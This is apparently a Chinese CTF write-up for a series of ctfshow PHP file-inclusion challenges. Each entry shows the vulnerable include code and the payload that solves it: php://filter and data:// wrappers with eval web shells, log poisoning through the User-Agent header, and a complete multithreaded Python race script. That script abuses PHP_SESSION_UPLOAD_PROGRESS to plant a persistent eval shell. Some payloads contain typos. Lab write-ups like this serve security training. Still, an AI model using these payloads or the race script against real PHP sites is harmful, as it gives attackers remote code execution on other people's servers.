web78
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:52:43
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
这道题的话直接用php伪协议,没有任何过滤直接用就好
?file=php://filter/convert.base64-encode/resource=flag.php
然后base64解码就好
web79
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:10:14
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
这次换个协议,用data
data://text/plain,<?=eval($_POST[1]);?>
然后post传1=system(‘tac flag.php’);
web80
<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);
include($file);
}else{highlight_file(__FILE__);
}
上把刚用了data协议这把就禁了
这里用临时日志
先用user-agent 插入<?php eval($_POST[1]);?>
再?file=/var/log/nginx/access.log,同时post传参
发现结果不对,ls试了一下发现换名字了,改成fl0g.php,即可
web81
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
这个的话可以白嫖上道题的,还是很不错的
web82
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
这次的话把小数点也禁了,这样的话就要用到无后缀了,考虑session
通过
会生成/tmp/sess_aaa文件
PHP_SESSION_UPLOAD_PROGRESS获取文件上传进度,通过它写指定的内容
然后就是跑脚本session竞争
import requests
import io
import threading
url = 'http://8627fd5b-9970-4ef4-9bc7-fa02b3c38342.challenge.ctf.show/'
sessionid='ctfshow'
data = {
"1":" file_put_contents('/var/www/html/2.php','<?php eval($_POST[2]);?>');"
}
def write(session):
fileBytes = io.BytesIO(b'a'*1024*50)
while True:
response=session.post(url,
data={
'PHP_SESSION_UPLOAD_PROGRESS' : '<?php eval($_POST[1]);?>'
},
cookies={
'PHPSESSID':sessionid
},
files={
'file':('ctfshow.jpg',fileBytes)
}
)
def read(session):
while True:
response=session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
cookies={
'PHPSESSID': sessionid
}
)
response2=session.get(url+'2.php');
if response2.status_code==200:
print('+++++++++++++++nice+++++++++++++++++')
else:
print(response2.status_code)
if __name__ == '__main__':
event=threading.Event()
with requests.session() as session :
for i in range(5):
threading.Thread(target=write,args=(session,)).start()
for i in range(5):
threading.Thread(target=read, args=(session,)).start()
event.set()
然后访问2.php,再post传参命令执行
web83
Warning: session_destroy(): Trying to destroy uninitialized session in /var/www/html/index.php on line 14
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 20:28:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
session_unset();
session_destroy();
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
虽然有session销毁,但是上次的脚本还可以继续使用
web84
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 20:40:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
system("rm -rf /tmp/*");
include($file);
}else{
highlight_file(__FILE__);
}
这道题是先销毁了临时目录下的文件,再文件包含
不过脚本还可以跑,因为他每次删除都有间隔,叫cpu时间,如果我们在间隔时写进了文件还是可以成功的(该方法多线程不安全)
web85
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 20:59:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
if(file_exists($file)){
$content = file_get_contents($file);
if(strpos($content, "<")>0){
die("error");
}
include($file);
}
}else{
highlight_file(__FILE__);
}
这次内容里面不可以有<,
虽然理论上不可以了,不过上次脚本还可以试试,不行的话增加线程到10(我自己用的5个线程还可以)
web86
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 21:20:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
它定义了一个包含路径,不过不影响继续用之前的脚本
web87
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 21:57:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
这次变成了一个写文件,考虑使用伪协议的过滤器?file=php://filter/write=string.rot13/resource=1.php,用两次url全编码
再用凯撒13进行编码<?php system('tac f*.php');?>
写入文件后直接访问1.php即可
web88
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-17 02:27:25
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
这道题没有过滤冒号,可以直接用伪协议?file=data://text/plain;base64,<?php system('tac *.php');?>aa(为什么要加个aa,因为base64编码后会有=或者+存在,但因为这俩符号都被过滤了,所以在后面加两个无关字符来改变末尾的符号)对黄色部分进行base64编码即可
web116
这道题是一个视频,根据提示有misc,所以直接下载先
然后用binwalk分离发现了png图片但是保存不下来
又安装了foremost,分离后发现了图片但打不开,移动到windows桌面后看到
他这个就直接是文件包含,直接?file=flag.php就可以,然后抓包查看响应,再base64解码得到flag
web117
<?php
/*
# -*- coding: utf-8 -*-
# @Author: yu22x
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 18:16:59
*/
highlight_file(__FILE__);
error_reporting(0);
function filter($x){
if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i',$x)){
die('too young too simple sometimes naive!');
}
}
$file=$_GET['file'];
$contents=$_POST['contents'];
filter($file);
file_put_contents($file, "<?php die();?>".$contents);
这道题要绕过死亡die()利用filter伪协议再加编码绕过
就是利用编码把前面的规则变成不正常的东西,再把我们不正常的东西变成正常代码
?file=php://filter/write=convent.iconv.UCS-2LE.UCS-2BE/recource=a.php
同时post传递
content=?<hp pvela$(P_SO[T]1;)>?
然后再访问a.php命令执行即可